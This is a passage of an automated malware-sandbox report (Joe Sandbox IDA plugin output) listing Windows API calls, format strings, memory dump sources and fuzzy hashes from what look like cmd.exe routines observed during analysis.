                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00018E86,00018E5A,00000000), ref: 0001DC98
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DC60: RtlFreeHeap.NTDLL(00000000), ref: 0001DC9F
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002A097
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heapmemset$FreeProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1291122668-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 74c6f1abf16a2f9da51c577f5b426bbd400104e37c8811da2d6d35d2cdf51425
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cb3eef83a63f1721f691d61c9db30ec55f326087bdb3780905df6628bcae8580
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74c6f1abf16a2f9da51c577f5b426bbd400104e37c8811da2d6d35d2cdf51425
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98B1DF71E00229DFCB24DFA8D981AEEB7F5EF59710F144069E805AB242DB31ED91CB91
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00035997
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001AB7F: iswspace.MSVCRT ref: 0001AB8D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001AB7F: wcschr.MSVCRT ref: 0001AB9E
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Enumiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3493821229-3301834661
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2f46b91c6bd0ee822b867af6c0cfe272951ec06dbf7bdcb62c41fce2a4e12928
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1461d710c1e03ce06d17759cd79f1017f6f944c5c4717356884f82b5d0db87e3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f46b91c6bd0ee822b867af6c0cfe272951ec06dbf7bdcb62c41fce2a4e12928
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B816DB1E006195BDF359B28CC95BFE73BDEF84301F1442A9E40A97251EB709E81CB91
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 0-1704545398
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3e28a1a694b78b1199f31d042e2ca889f505f972cb447069147249f863808d7b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8b653e2bb79b57c297ccc2d7713ce0a0a011dccb8d86ea923d965134a0562e35
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e28a1a694b78b1199f31d042e2ca889f505f972cb447069147249f863808d7b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E515975A8020196FB747B64E815FFE36E2FB51314F18453AD80687291EBB9CCC4C792
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigit$wcstol
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: aApP
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 644763121-2547155087
APIs
• RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000357F8
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00035886
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: EnumErrorLast
• String ID: %s=%s$.
• API String ID: 1967352920-4275322459
APIs
• memset.MSVCRT ref: 0003A79F
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 0003A83C
• ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?), ref: 0003A8B5
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: memset$DiskFreeSpace
• String ID: %5lu
• API String ID: 2448137811-2100233843
APIs
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00033835
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00033847
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: ErrorLastOpenSemaphore
• String ID: _p0$wil
• API String ID: 1909229842-1814513734
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 0003239F
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 000323CD
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateCurrentMutexProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Local\SM0:%d:%d:%hs$wil
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3937467467-2303653343
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9f53c5f9fda094d37bbf5c9cdaf3affaf7247a9ecb1028d590598283f156416b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d39978e64b7d6579f55ef9159cb822f8ea84a8e87a1c67e76462df4dbba8fcd4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f53c5f9fda094d37bbf5c9cdaf3affaf7247a9ecb1028d590598283f156416b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C41C576A4022C9BCB22EB54DC89AEEB7B9AF94700F1041C5E909A7241DB709F858F91
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003B25E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcslwr.MSVCRT ref: 0003B2D2
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?), ref: 0003B30B
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$_wcslwr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: [%s]
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 886762496-302437576
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 210b53315f95602d79ec608088069c9f820664ac0490266469faba4513bd3d92
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fd613c7376454e1f8b95ff70c76cb62f5e796b21aa964ced45db96e0a6c9029a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 210b53315f95602d79ec608088069c9f820664ac0490266469faba4513bd3d92
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9318271B002196BDB15DBA9D8C5BEFB7FCAB58314F0401A9A605E3242DB74DE848B50
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: /-Y$COPYCMD
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1886669725-617350906
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3defc6e345137a12e3ca1f5eee7e75cafa4b4772dc7cddf4984afbffb49444d6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 25208438ef5778c24b9544265b0dd4c1375b29b1167c670e499175421091f473
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3defc6e345137a12e3ca1f5eee7e75cafa4b4772dc7cddf4984afbffb49444d6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7218E75F002319BCB289B1DAC557BFBAE9EF85354F614099F845A7240EB70CD41C260
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019E8E: iswspace.MSVCRT ref: 00019E9E
                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT ref: 00019E28
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00019E79
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswspace$_wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: off
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3989682491-733764931
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002727B: __iob_func.MSVCRT ref: 00027280
                                                                                                                                                                                                                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 00035182
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: __iob_funcfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 620453056-2781220306
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 0003351B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 0003352C
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-582119455
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 000338FB
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00033907
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-919018592
APIs
• memset.MSVCRT ref: 0002539E
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• ??_V@YAXPAX@Z.MSVCRT(?,00007FE9), ref: 000254C6
  • Part of subcall function 00018E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00058BF0,00000000,?), ref: 00018EC3
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: memset$CurrentDirectory
• String ID:
• API String ID: 168429351-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: _wcsnicmp$wcschr
• String ID:
• API String ID: 3270668897-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: iswdigit
• String ID:
• API String ID: 3849470556-0
APIs
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D3A
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D44
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D57
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D61
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: ErrorMode$FullNamePath
• String ID:
• API String ID: 268959451-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0001C5BD
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 0001C5C4
                                                                                                                                                                                                                                                                                                                                                                                                                          • _setjmp3.MSVCRT ref: 0001C630
                                                                                                                                                                                                                                                                                                                                                                                                                          • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 0001C69D
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FreeHeap$ProcessVirtual_setjmp3
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2613391085-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
